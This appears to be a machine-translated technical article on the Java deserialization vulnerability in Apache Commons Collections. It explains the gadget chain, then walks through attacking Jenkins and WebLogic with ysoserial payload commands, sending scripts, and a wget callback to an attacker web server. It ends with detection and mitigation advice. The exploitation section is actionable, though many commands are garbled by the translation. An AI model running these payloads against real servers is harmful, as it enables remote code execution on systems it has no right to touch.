Technical Analysis of Java deserialization Vulnerability

Technical Analysis of Java deserialization Vulnerability
1. Background of Java deserialization Vulnerability

In short, serialization refers to the process of converting the object state to a format that can be kept or transmitted (bytestream ). In contrast to serialization, deserialization converts a stream (bytestream) to an object. These two processes can be combined to easily store and transmit data.

1.1 JAVA serialization

1. java provides an object serialization mechanism in which an object can be expressed as a byte sequence, the byte sequence includes the data of the object, information about the object type, and data types stored in the object.

2. After writing a serialized object to a file, it can be read from the file and deserialized. Object type information, object data, and data types in the object can be used to create an object in memory

3. The entire process is Java Virtual Machine (JVM) independent. Objects serialized on windows can be deserialized on centos. This process is cross-platform.

4. ObjectInputStream and ObjectOutputStream are high-level data streams that contain methods for serializing and deserializing objects.

The following is a sample code for Java to serialize an object to bytestream.

First, define a Person class that implements the Serializable interface.

The conditions that must be met for a class to be successfully serialized are:

 

1. This class must implement java. io. Serializable object

2. All attributes of this class must be serializable. If an attribute is not serializable, the attribute must be short-lived (only available in memory)

3. To determine whether a Java standard class is Serializable, you only need to check whether the class has implemented the java. io. Serializable interface in the document.

The ObjectOutputStream class is used to serialize an object. The writeObject () method can be used to serialize the object. The following is the sample code for serialization using the writeObject () method of the ObjectOutputStream class. Serialize the Person class to myPerson. ser.

When serializing an object to a file, A. ser extension is provided to the file according to Java's standard convention.

1.2 Java deserialization

The readObject () method of the ObjectInputStream class is used for deserialization. The following is the instance code for deserialization. Read the serialized content from the myPerson. ser file and restore it to the Person class.

Normally, normal data streams are deserialized to produce the expected normal objects.

However, when deserialization is performed, the deserialized data is maliciously constructed. In this case, deserialization produces unexpected malicious objects. This may cause arbitrary code execution. The ObjectInputStream class is responsible for deserialization in specific work. When executing the readObject () code, it will read the serialized bytestream. Due to Java features, although the read object will eventually encounter classcastexception during type conversion, the object has actually been created and its constructor and class constructor have been called, in fact, restricted function execution is already in place. And it does not impose any restrictions on the type of the generated object, which increases the possibility of arbitrary code execution.

 

2 Analysis on deserialization vulnerability through Apache Commons Collections

The Ysoserial tool supports generating four types of payload Apache Commons Collections 3 and 4, Groovy and Spring when generating payload. As long as the Class Path of the target application contains these libraries, the payload generated by ysoserial allows readObject () to execute arbitrary commands. The Apache Commons Collections library has a wide impact. We will focus on the use of Apache Commons Collections.

2.1 commons collections Overview

The Java Collections Framework was a major addition in JDK 1.2. it added extends powerful data structures that accelerate development of most significant Java applications. since that time it has become the recognized standard for collection handling in Java.

Commons-Collections seek to build upon the JDK classes by providing new interfaces, implementations and utilities. There are using features, including:

Bag interface for collections that have a number of copies of each object

BidiMap interface for maps that can be looked up from value to key as well and key to value

MapIterator interface to provide simple and quick iteration over maps

Transforming decorators that alter each object as it is added to the collection

Composite collections that make multiple collections look like one

Ordered maps and sets that retain the order elements are added in, including an LRU based map

Reference map that allows keys and/or values to be garbage collected under close control

 

Many comparator implementations

 

Many iterator implementations

Adapter classes from array and enumerations to collections

Utilities to test or create typical set-theory properties of collections such as union, intersection, and closure

Apache official Commons Collections introduction can refer to this page

Https://commons.apache.org/proper/commons-collections/

Apache Commons Collections is an encapsulation class of Java basic containers. It abstracts many powerful interfaces and adds many powerful data structures, reducing the burden on developers, and significantly accelerated the development of Java applications.

2.2 using apache commons collections to analyze the principle of JAVA deserialization vulnerability.

As mentioned above, we can now construct a special bytestream and restore it to an Object through deserialization. The constructor and class constructor of this Object have been called. The constructors of which classes can provide the ability to execute code. The researchers found that if a common-collections is used in the classpath application, ChainedTransformer and InvokerTransformer are very useful, the latter or even constructor directly provides the ability to execute reflection based on the passed class name and function name!

These Transformer functions implement the transform function. InvokerTransformer executes the transformer according to the parameter reflection provided during object construction, and ChaindTransformer concatenates several transformers for linear execution. Who will call these transformer functions? TransformedMap can accept these transformer as parameters. When its setValue function is called, transformer is executed to trigger code execution.

Who will call the setValue of transformedMap? So far, we have made all the explosives and leads ready to ignite it.

At this time, we will find sun. reflect. annotation. AnnotationInvocationHandler meets these conditions based on the source code call!

We can see that the class AnnotationInvocationHandler is Serializable. As we mentioned earlier, only classes that implement Serializable can be serialized. In addition, the setValue () function is called for each item of memberValues during the deserialization of readObject. As a result, expmer constructs an annotationinvocationhandler, and sets transformer containing the attack code (runtime.exe c) together as a map and passes it to handler as a parameter. This handler is serialized as bytestream and directly sent to the attacked web application!

Here, the common-collections Library only provides a vector for code execution. Just like the exploit technique for memory corruption vulnerabilities such as drop, it is not a real vulnerability. the vulnerability is that the developer arbitrarily uses ObjectInputStream on the externally exposed interface. As a result, the specially constructed data may be maliciously deserialized.

3 deserialization vulnerability exploitation practices Jenkins and weblogic3.1 JENKINS

First, we need to generate the payload for the command we want to execute. Use the following command:

Java-jar ysoserial-0.0.2-all.jar CommonsCollections1 'command'> payload

Here, command is the command we want to execute on the target machine, but please note that our command execution has no echo. Therefore, we cannot directly determine whether the command is successfully executed. We need to use an indirect method.

 

After generating payload, run the following command to send the attack code:

 

Python jenkins. py ip port payload

Jenkins. py is for the jenkins service. For other services, you only need to replace it with the corresponding python file. Then there is the target ip address and port, and the final paylaod is the file we just generated.

Obtain the execution result. As I said, the command is not echo. We use indirect methods. You can build a temporary web server on the public network and then let the target machine access us. If our command is successfully executed, the target machine will request our web page. In this way, by viewing web logs, we can know which ip addresses are vulnerable.

The following is an example:

Generate the payload command wget-O-http: // 192.168.1.212.

Http: // 192.168.1.212/is the temporary web server.

Java-jar ysoserial-0.0.2-all.jar CommonsCollections1 'wget-O-http: // 192.168.1.212/'> payload

First, we need to clear the web access logs.

Echo>/var/log/nginx/access. log

Then send malicious code to the target machine:

Python jenkins. py 192.168.1.212 8088 payload

 

View the log again

Tail/var/log/nginx/access. log

We can see that after the command is run, a machine can access our web server to determine whether the command is successfully executed.

3.2 WEBLOGIC

Weblogic testing is a little more difficult than jenkins. py. The scripts provided by Foxglovesec are not intelligent enough. For different commands, You need to manually modify the test scripts. The following sections describe them one by one.

First, describe how to build the test environment.

Centos 6.5 + weblogic 10.3.6.0 is used in the test environment.

Download weblogic from the oracle official website and decompress it. Then go to the directory and open the terminal.

Run

Export JAVA_HOME =/home/myhome/myjavahome

 

Export MW_HOME =/home/myhome/mywls

 

JAVA_HOME is the java installation directory on the system, centos on/usr/lib/jvm/java-1.7.0-openjdk/

. If you do not have java, you can install it using the yum install java-1.7.0-openjdk.i686.

MW_HOME is the directory that was just extracted.

Run

./Configure. sh

Set weblogic Environment Variables

$ MW_HOME/wlserver/server/bin/setWLSEnv. sh

We can see that there are two main environment variables: CLASSPATH and PATH.

Then confirm that the environment variable is set successfully.

Echo $ CLASSPATH

Echo $ PATH

If the above output is not found, it indicates that the setting is not successful and you need to manually export it:

 

These environment variables are only valid on the current terminal.

 

Create a domain.

Graphical interface configuration is used here

$ MW_HOME/wlserver/common/bin/config. sh

This is relatively simple, continue to the next step

Finally, a user_projects directory will be created under the current directory, which contains our domain. Go to the innermost part, run startWebLogic. sh to start the service, enter the account password, and then start the service after the verification is successful.

Test script

The weblogic test script provided by Foxglovesec must generate payload with ysoserial, and then modify the start four bytes of payload based on the total length of the payload. Here I have modified the original test script. For a test, you only need to enter the command we want to execute.

Python weblogic. py 192.168.1.212 7001 'rm-f/tmp/kernux'

This is similar to the script provided by c0debreak. The serialized package is rewritten using c0debreak, and the original ysoserial has a bug.

Before running the test script

 

Run the test script

After running the test script

Access records from virtual machines indicate that the command is successfully executed.

Two modified test scripts are provided in the attachment.

Python weblogic. py 192.168.1.212 7001 'rm-f/tmp/kernux'

Pythonjenkins. py 192.168.1.212 8080 'rm-f/tmp/kernux'

4 quick troubleshooting and fixing of Java deserialization Vulnerabilities

Currently, the main components packaged with the apache commons collections library and widely used are Jenkins WebLogic Jboss WebSphere OpenNMS. Most Jenkins functions need to be directly exposed to the public network.

First, check whether the product contains the above five components.

Use the grep command or other related search commands to check whether the installation directory of the above components contains the Apache Commons Collections library. Search for the following jar files.

 

Commons-collections.jar

 

*. Commons-collections.jar

Apache. commons. collections. jar

*. Commons-collections. *. jar

For more information, see the following solutions.

4.1 WEBLOGIC

Temporary solution

1. Use SerialKiller to replace the ObjectInputStream class for serialization;

2. Delete

"Org/apache/commons/collections/functors/InvokerTransformer. class" file;

Official Solution

Official statement:

Http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html

Weblogic users will receive official repair support

4.2 JBOSS

 

Temporary solution

1. Delete InvokerTransformer, InstantiateFactory, and

InstantiateTransfromer class file

Official Solution

Please follow the official issue:

Https://issues.apache.org/jira/browse/COLLECTIONS-580

4.3 JENKINS

Temporary solution

1. Use SerialKiller to replace the ObjectInputStream class for serialization;

2. Delete

"Org/apache/commons/collections/functors/InvokerTransformer. class" file;

Official Solution

Official patch declaration link:

Https://jenkins-ci.org/content/mitigating-unauthenticated-remote-code-execut

Ion-0-day-jenkins-cli

Https://github.com/jenkinsci-cert/SECURITY-218

4.4 WEBSPHERE

Temporary solution

1. Use SerialKiller to replace the ObjectInputStream class for serialization;

2. Delete

"Org/apache/commons/collections/functors/InvokerTransformer. class" file;

SerialKiller temporary patch: https://github.com/ikkisoft/SerialKiller